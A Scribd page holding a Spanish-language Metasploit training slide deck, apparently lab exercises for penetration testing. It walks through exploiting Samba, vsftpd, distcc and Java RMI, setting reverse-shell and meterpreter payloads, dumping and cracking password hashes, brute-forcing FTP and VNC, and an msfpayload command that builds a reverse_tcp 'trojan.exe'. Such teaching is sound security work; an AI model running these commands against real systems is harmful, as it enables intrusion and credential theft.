Scribd Logo
Importer

Bienvenue sur Scribd !

  • 03 Metasploit

    Transféré par

    aebarrientos
    39 vues12 pages
    metasploit linux

    Titre original

    03 metasploit

    Copyright

    © © All Rights Reserved

    Formats disponibles

    PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    metasploit linux

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    39 vues12 pages

    03 Metasploit

    Transféré par

    aebarrientos
    metasploit linux

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 12

    Audit | Tax | Advisory 1

    MetaSploit
    Conceptos basicos:

    FrameWork: En el desarrollo de software, un Framework es una


    estructura de soporte definida en la cual otro proyecto de software puede
    ser organizado y desarrollado. Tipicamente,un framework puede incluir
    soporte de programas, librerias y un lenguaje de scripting entre otros
    software para ayudar a desarrollar y unir los diferentes componentes de un
    proyecto.
    Exploit: Exploit (viene de to exploit - aprovechar) - cdigo escrito con el fin
    de aprovechar un error de programacin para obtener diversos privilegios
    Shell: Parte fundamental de un sistema operativo encargada de ejecutar
    las rdenes bsicas para el manejo del sistema. Tambin se denomina
    Shell. Suelen incorporar caractersticas tales como control de procesos,
    redireccin de entrada/salida y un lenguaje de rdenes para escribir
    programas por lotes o (scripts).
    Audit | Tax | Advisory 2

    1
    MetaSploit
    explicare los mas comunes.
    win32_adduser: agregara un usuario(con permisos elevados) al
    sistema que nos penetremos
    win32_bind_vncinject: nos mostrara la pantalla del usuario con la
    cual podemos manejar y controlar su equipo remotamente (un VNC).
    win32_downloadexec: Descargara un archivo de algun servidor web
    o ftp y lo ejecutara(entre ellos puede estar troyanos ).
    win32_exec: Ejecutara un comando especificado por ti en la variable
    CMD.
    win32_reverse: Mi favorita. Nos dar una shell inversa por si tiene
    firewall y no podemos abrir puertos.
    win32_reverse_vncinject:Nos dar un VNC inverso por si tiene
    firewall y no podemos abrir puertos.

    Audit | Tax | Advisory 3

    MetaSploit
    recomiendo que solo rellenen las variables que digan required ya que
    las
    opcionales son para opciones mas avanzadas, aqu solo nos esta pidiendo
    RHOST (host que atacaremos) y RPORT (puerto por el que se conectara),
    nos puede pedir mas LHOST y LPORT (para conexiones inversas son el
    host y el puerto que estar esperando la conexin para dar darle ordenes
    en este caso tu IP y un puerto disponible de tu maquina), las dems
    opciones las puedes llenar intuitivamente dependiendo del
    exploit, ataque y etc que seleccionaste, para ir rellenando casa variable:
    set [Variable] [Valor]
    set RHOST IPVIctima
    set RPORT PuertoDeLaVictima
    en este caso RPORT tiene un valor por defaul como se ve en la imagen
    (135) este no lo cambien a menos que sea necesario (que la victima tenga
    el servicio en otro puerto).Una vez rellenadas todas las variables, solo
    queda poner el comando:
    exploit
    Audit | Tax | Advisory 4

    2
    MetaSploit
    Resumen:

    Use module empezar usando un modulo.


    Show options- mostrar las diferentes opciones configurables
    Set nombre del variable valor- set option
    Exploit- explotacion
    Run- ejecucion
    Help commando ayuda sobre un commando

    Audit | Tax | Advisory 5

    MetaSploit
    Ejemplo:

    Exploit netapi contra windows

    Audit | Tax | Advisory 6

    3
    Explotando java
    Tarea:
    Lanzar exploit java_rmi_server contra servidor linux

    Audit | Tax | Advisory 7

    En este ataque realizarnos ataque de diccionario contra el servicio


    Vnc en puerto TCP 5900 .
    Usar el ataque auxiliary/scanner/vnc/vnc_login
    Cuando se encuntrala contrasea usar vncviewer.

    Audit | Tax | Advisory 8

    4
    Exploits:
    Tarea:
    Lanzar exploit distcc_exec contra el mismo IP

    Lanzar exploit vsftpd

    Audit | Tax | Advisory 9

    Hacking servicio samba


    Tarea:
    Usar el exploit usermap_script cotra el servidor virtual.
    Configurar payload cmd/unix/reverse
    Ejecutar y poner la session en el background (ctrl Z)
    Depsues ejecutar modulo post/linux/gather/hashdump para capturar los
    hashes
    Ejecutar John para relevar los hashes

    Audit | Tax | Advisory 10

    10

    5
    Usando John

    Audit | Tax | Advisory 11

    11

    Hacking servicio samba


    Tarea:
    Usar el exploit usermap_script cotra el servidor virtual.
    Configurar payload cmd/unix/reverse
    Ejecutar y poner la session en el background (ctrl Z)
    Depsues ejecutar modulo post/linux/gather/hashdump para capturar los
    hashes
    Ejecutar John para relevar los hashes

    Audit | Tax | Advisory 12

    12

    6
    Hacking Windows 7
    Demostracion

    exploit/windows/browser/ms10_046_shortcut_icon_dllloader

    #msf > set payload windows/meterpreter/reverse_tcp

    #msf > set SRVHOST local ip

    #msf > set LHOST local ip

    exploit

    Audit | Tax | Advisory 13

    13

    Ataque fuerza bruta servicio FTP


    1.Escanear la red interna y encontrar servicio FTP abierto (tcp21)
    2.Dento msf usar el modulo auxiliary/scanner/ftp/ftp_login para realizar un
    ataque fuerza bruta.

    Audit | Tax | Advisory 14

    14

    7
    Ataque fuerza bruta servicio FTP
    Resolucin:
    1.En MSF use auxiliary/scanner/ftp/ftp_login
    2.set RHOSTS ip_servidor_ftp
    3.set PASS_FILE /pentest/passwords/wordlists/rockyou.txt
    4.set USER_FILE /pentest/passwords/wordlists/users.txt
    5.Run

    Audit | Tax | Advisory 15

    15

    Ataque fuerza bruta servicio FTP

    Usando Hydra para realizar un ataque diccionario a servicio ftp:

    Audit | Tax | Advisory 16

    16

    8
    Explotacion!
    El commando show payload nos permite verlos diferentes payloads que le
    podemos enviar con el exploit, MSF mostrara solo los payloads compatibles
    con el exploit.

    Ahoraingresamosset payload windows/shell/reverse_tcppara


    Seleccionar unaconexion reversa y nuevamenteShow options

    Audit | Tax | Advisory 17

    17

    Buscando puertos de salida para el envio de


    Shell remoto

    Audit | Tax | Advisory 18

    18

    9
    Audit | Tax | Advisory 19

    19

    Audit | Tax | Advisory 20

    20

    10
    Audit | Tax | Advisory 21

    21

    Audit | Tax | Advisory 22

    22

    11
    Crear un payload

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe

    Usar exploit/multi/handler

    Audit | Tax | Advisory 23

    23

    SET

    Demo Hacking Windows 7

    Audit | Tax | Advisory 24

    24

    12

    Vous aimerez peut-être aussi